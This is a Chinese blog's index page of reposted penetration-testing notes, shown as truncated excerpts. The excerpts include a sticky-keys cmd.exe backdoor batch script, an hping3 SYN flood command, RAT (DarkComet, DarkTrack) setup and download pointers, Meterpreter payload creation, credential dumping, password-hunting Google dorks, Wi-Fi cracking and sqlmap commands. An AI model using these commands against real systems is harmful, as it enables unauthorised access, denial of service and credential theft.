自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(51)
  • 收藏
  • 关注

转载 使用Nethunter(Kali黑客手机)wifite破解无线密码

简介:NetHunter是一个基于Kali Linux为Nexus设备构建的Android渗透测试平台,其中包括一些特殊和独特的功能。NetHunter支持无线802.11注入,一键MANA AP搭建,HID键盘(类Teensy攻击)以及BadUSB MITM攻击测试等。只有部分型号的设备可以刷此系统,比如Google的Nexus、一加等,可以参考官网给出的说明进行选择。...

2019-09-04 11:39:00 5250

转载 使用Wifi pineapple(菠萝派)进行Wi-Fi钓鱼攻击

简介:WiFi Pineapple 是由国外无线安全审计公司Hak5开发并售卖的一款无线安全测试神器。特性:用作 Wi-Fi 中间人攻击测试平台一整套的针对 AP 的渗透测试套件基于 WEB 应用的管理界面基于嵌入式 linux 系统不定时的各种软件更新,可以自定义模块、payload官方版本的有点小贵,如果打算购买正版,可以海淘使用转运服务运输...

2019-09-04 10:34:00 6446

转载 DVWA 安全测试靶机本地搭建

前期的搭建步骤这里就不多做表述了,网上文章很多,这里主要讲后续会遇到的问题和需要修改的地方。首先将config-inc.php.dist 修改为config-inc.php设置Key值$_DVWA[ 'recaptcha_public_key' ]= '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';$_DVWA[ 're...

2019-06-28 19:34:00 812

转载 Android安全测试

转载于:https://www.cnblogs.com/AirCrk/p/7482872.html

2017-09-06 09:06:00 178

转载 elk平台定制化查询规则

一、查询某IP在某时间内TOP10的请求步骤:点击“Visualize”选项卡创建“Data table”点击“From a new search”下拉选择“F5-access”在“buckets”区域点击“Split Rows”Aggregation区域下拉选择“Terms”Field区域下拉选择requestSize区域修改为10搜索框内输...

2017-06-12 11:14:00 208

转载 lucene查询语法简介

为什么要介绍lucene:我们在ELK中搜索相关日志的时候,搜索语言需要遵循Lucene才可以匹配到需要的信息什么是Lucene:Lucene是一套用于全文检索和搜寻的开源程式库,由Apache软件基金会支持和提供参考:https://lucene.apache.org/core/2_9_4/queryparsersyntax.html#NOThttp://...

2017-06-10 16:55:00 199

转载 ELK日志收集分析平台 (Elasticsearch+Logstash+Kibana)使用说明

使用ELK对返回502的报警进行日志的收集汇总eg:Server用户访问网站返回502首先在zabbix上找到Server的IP然后登录到elk上使用如下搜索条件:pool_select:X.X.X.X AND status:502 AND verb:GET返回如下的界面:Time:返回502发生的时间Domainname:返回502发生错...

2017-06-10 16:44:00 183

转载 ELK (Elasticsearch+Logstash+Kibana)部署

部署机器:服务端:dev-server X.X.X.X ( logstash-1.5.4,elasticsearch-1.7.1,kibana-4.1.1 )客户端:dev-client X.X.X.X (logstash-forwarder-0.4.0-1)需求:将客户端访问日志(nginx log)在ELK中展示。安装ELK:服务端:设置FQDN...

2017-06-10 16:13:00 88

转载 Linux版的Mimikaz

A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.https://github.com/huntergregal/mimipenguinDetails...

2017-05-22 10:59:00 174

转载 考试背题软件推荐

最近在备战信息安全管理员二级考试,在网上找了好久背题的软件,最终锁定了思科的模拟考试软件 Visual CertExam Suite这个软件以前考CCNA的时候用过,之后就再也没用过了,这次考试又想起了它,重新使用后发现体验非常棒。我们既可以用它自定义题库内容和答案,又可以设置是否随机出题、考试时间和题目范围等参数。下图是模拟考试时的界面:这个是题目设计界面,也可以在...

2017-01-12 14:35:00 397

转载 SYN Flood测试

由于工作需要对公司进行SYN Flood测试,在网上查了些资料,Youtube上找到最多的方法就是hping3工具来实现,该工具已经预装在Kali下,具体操作用一条命令即可实现。hping3 -S --flood 目标地址转载于:https://www.cnblogs.com/AirCrk/p/6144465.html...

2016-12-08 12:25:00 454

转载 内网渗透笔记

net group /domain|more 查询域里的组并分页显示 net group "XXXXX" /domain 查询指定用户组成员 转载于:https://www.cnblogs.com/AirCrk/p/6144389.html

2016-12-08 11:58:00 160

转载 shift粘滞键后门创建/复原批处理

创建shift粘滞键后门:1 c:2 3 cd \Windows\System32\4 5 rename sethc.exe bak_sethc.exe6 7 xcopy cmd.exe sethc.exe8 9 exit恢复原状态:c:cd \Windows\System32\del sethc.exe...

2016-11-10 17:55:00 269

转载 通过Wireshark抓包进行Cookie劫持

首先在目标A机器上运行Wireshark并开启浏览器,开启前关闭其他占用网络的软件,这里我拿51CTO.com做测试。正常登陆51CTO用户中心,此时使用http.cookie and http.request.method==POST语法对Wireshark捕获的数据包进行过滤。如图所示,展开Hypertext Transfer Protocol项查看捕获到...

2016-11-10 17:50:00 1453

转载 【思维导图】Wireshark HTTP/HTTPS协议抓包

转载于:https://www.cnblogs.com/AirCrk/p/6051566.html

2016-11-10 16:53:00 212

转载 DarkTrack 4 Alien Version Released RAT 下载地址&视频教程

不废话,点我下载。官方论坛:https://forum.darktrack.net作者脸书:https://www.facebook.com/darktrackratE安全报道:https://www.easyaq.com/newsdetail/id/1341023079.shtmlPS:测试了下,直接生成的文件过不...

2016-10-07 20:17:00 165

转载 国外远控软件DarkComet-RAT

下载地址:[点此下载]使用步骤:注册noip.org账号创建主机地址。安装并配置DUC。配置监听端口配置NO-IP Updater 然后点击Update ,配置成功则会提示Success。设置路由器端口转发转载于:https://www.cnblogs.com/AirCrk/p/5852855.html...

2016-09-08 14:03:00 1040

转载 Exploitation with Social Engineering Toolkit SET

下面演示如何使用S.E.T工具创建Payload并配置Armitage实现目标主机自动上线。打开S.E.T工具选择第一项,进行Attacks配置。选择4创建一个Payload和Listener。然后选择第二项Windows Reverse_TCP Meterpreter配置LHOST地址为自己本机的IP,端口填写443,打开自动生成的Payload.e...

2016-09-06 15:04:00 148

转载 Metasploit各版本对比

功能特性描述MetasploitFrameworkMetasploitCommunityMetasploitExpressMetasploit ProPricingLicense无IP限制FreeFree...

2016-08-31 14:13:00 557

转载 【思维导图】安全漏洞生命周期

整理自《Metasploit渗透测试魔鬼训练营》转载于:https://www.cnblogs.com/AirCrk/p/5819168.html

2016-08-29 18:46:00 269

转载 【思维导图】渗透测试流程

整理自《Metasploit渗透测试魔鬼训练营》转载于:https://www.cnblogs.com/AirCrk/p/5819064.html

2016-08-29 18:11:00 180

转载 Imperva WAF使用笔记

添加IP白名单在对自己公司网站进行安全测试时会被WAF拦截,如果把WAF彻底停掉就无法拦截到外部的攻击了。此时可以添加IP地址白名单,白名单内的IP对网站发起扫描时不会做拦截。转载于:https://www.cnblogs.com/AirCrk/p/5806635.html...

2016-08-25 14:26:00 629

转载 elk查询语法

查询指定IP段,如123.123.123.*geo.ip=123.123.123.*转载于:https://www.cnblogs.com/AirCrk/p/5794398.html

2016-08-22 09:25:00 116

转载 Linux入侵检测常用命令

find / -mtime 0#0代表目前时间,表示从现在开始到24小时以前,有改动过内容的文件全都会被列出来。如果是3天前24小时内,则使用find / -mtime 3find /etc -newer /etc/passwd#查找/etc下面文件日期比/etc/passwd新的文件转载于:https://www.cnblogs.com/AirCr...

2016-08-16 09:37:00 186

转载 SPF邮件伪造漏洞测试脚本

测试脚本:# -*- coding: utf-8 -*-import socket,select,base64,os,re,time,datetimeclass mail: def __init__(self): self.errmsg = '' def send(self, buf): try: ...

2016-08-09 09:58:00 807

转载 Googlehack之Github hack

site:aircrk.com smtpsite:aircrk.com smtp @mail.comsite:aircrk.com root passwordsite:aircrk.com smtp passwordsite:aircrk.com sa passwordsite:aircrk.com User ID='sa';Passwordsite:aircrk.com String ...

2016-07-17 08:50:00 146

转载 Win7下共享WiFi热点方法

管理员权限运行CMDnetsh wlan set hostednetwork mode=allow ssid=Wifi名称 key=Wifi密码netsh wlan start hostednetwork创建后右键本地连接--属性--共享--允许其他网络连接到电脑 选择刚才创建的网络连接作者:AirCrk原文地址:http://www.cnbl...

2016-07-15 08:57:00 70

转载 Windows系统变量

%ALLUSERSPROFILE% : 列出所有用户Profile文件位置。%APPDATA% : 列出应用程序数据的默认存放位置。%CD% : 列出当前目录。%CLIENTNAME% : 列出联接到终端服务会话时客户端的NETBIOS名。%CMDCMDLINE% : 列出启动当前cmd.exe所使用的命令行。%CMDEXTVERSION% : 命令出当前命令处理程序...

2016-07-15 08:53:00 93

转载 BT5 & Kali Linux 网卡选择

【需要注意的几点】:芯片类型知否支持外接天线网卡固件版本支持的无线协议网卡功率BT5/Kali RC3支持网卡:RTL8187, R8187 (Realtek)功率高、兼容性好Ralink RT3070/RT2870功率低、兼容性差...

2016-07-14 22:02:00 1012

转载 使用MDK3探测隐藏SSID名称

先将网卡设置为监听模式。airmon-ng start wlan0扫描附近无线网络,找出隐藏SSID的AP。airodump-ng wlan0mon这里用下图搜到的第一个隐藏SSID做测试。破解指定MAC地址AP的SSID名称。mdk3 wlan0mon p -b a -t MAC地址 -s 100这里我们已经...

2016-07-13 09:07:00 1160

转载 N900快捷键

Ctrl + C复制文本Ctrl + V粘贴文本Ctrl + X剪切文本Ctrl + A全部选择Ctrl + O打开Ctrl + N新建Ctrl + S保存Ctrl + Z撤销Ctrl + Y重复Ctrl + F打开搜索框...

2016-07-12 16:24:00 57

转载 Wifite.py 修正版脚本代码

Kali2.0系统自带的WiFite脚本代码中有几行错误,以下是修正后的代码:#!/usr/bin/python# -*- coding: utf-8 -*-""" wifite author: derv82 at gmail author: bwall @botnet_hunter (ballastsec@gmail.com)...

2016-07-10 17:08:00 723

转载 使用Aircrack-ng进行无线安全审计

设置监听模式激活网卡ifconfig wlan0 up结束占用网络接口的进程airmon-ng check kill开启监听模式airmon-ng start wlan0查看网卡是否成功开启了监听模式iwconfigMode状态为Monitor为开启成功,Managed为不成功。捕获数据包此处须填...

2016-07-08 10:44:00 134

转载 web代理工具WebScarab

转载于:https://www.cnblogs.com/AirCrk/p/5650005.html

2016-07-07 14:34:00 80

转载 无线安全审计工具 Fern WiFi Cracker

使用这款工具前最好自定义一个MAC地址,以便隐藏我们的真实MAC地址信息。由于Fern WiFi Cracker是图形界面的,不需要敲命令,所以操作起来比Aircrack-ng简单了许多。首先选择Interface,如下图中的wlan0,然后点击蓝色Wifi图标使状态变为Active。软件会自动识别附近的WEP和WPA网络,这里我们只搜到了WPA类型的网络,点击WPA...

2016-07-06 17:01:00 676

转载 子域名收集方法整理

域传送漏洞dnsenumLayer子域名挖掘机 http://www.cnseay.com/4193/3SubDomainsBrute https://github.com/lijiejie/subDomainsBruteWydomain https://github.com/ring04h/wydomain转载于:https://www.cnblogs...

2016-07-06 16:40:00 406

转载 渗透测试报告收集、生成工具MagicTree

0x00 软件介绍:MagicTree是Gremwell开发的一个Java程序,支持主动收集数据和生成报告的工具。他通过树形结构节点来管理数据,这种分层存储的方法对管理主机和网络数据特别有效。其分析数据的能力特别强大。MagicTree可以基于选择的优先级创建可操作的报告,而这个报告是完全可定制的,甚至可以将数据导入到openOffice中。详细说明:http://www.g...

2016-07-01 14:44:00 311

转载 Nessus常见问题整理

个别问题感谢大学霸__IT达人在Kali中文网的解答。问题1:Kali自带Nessus产品注册失败 报Error(500):Activation failed出现这个错误原因很多。其中有一个原因是由于Nessus版本较低,而官网验证服务器已经不支持低版本的产品。这时,需要升级Nessus,才能完成产品注册。问题2:安装Nessus提示错误 未预期的文件结...

2016-07-01 09:39:00 2156

转载 The quieter you become,The more you are able to hear.

转载于:https://www.cnblogs.com/AirCrk/p/5630382.html

2016-06-30 16:19:00 455

转载 sqlmap笔记

sqlmap -u "注入链接" --其他参数或命令 (-v 1表示回显出注入过程)【判断指定字段是否存在注入点】当链接包含两个参数时,可用-p开关选择要注入的参数,例检测id是否存在注入点:sqlmap -u "http://www.xxx.com/test.asp?id=1&name=a" -v 1 -p "id"【带Cookie注入】登陆后抓取Cookie,sqlm...

2016-06-28 14:17:00 68

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除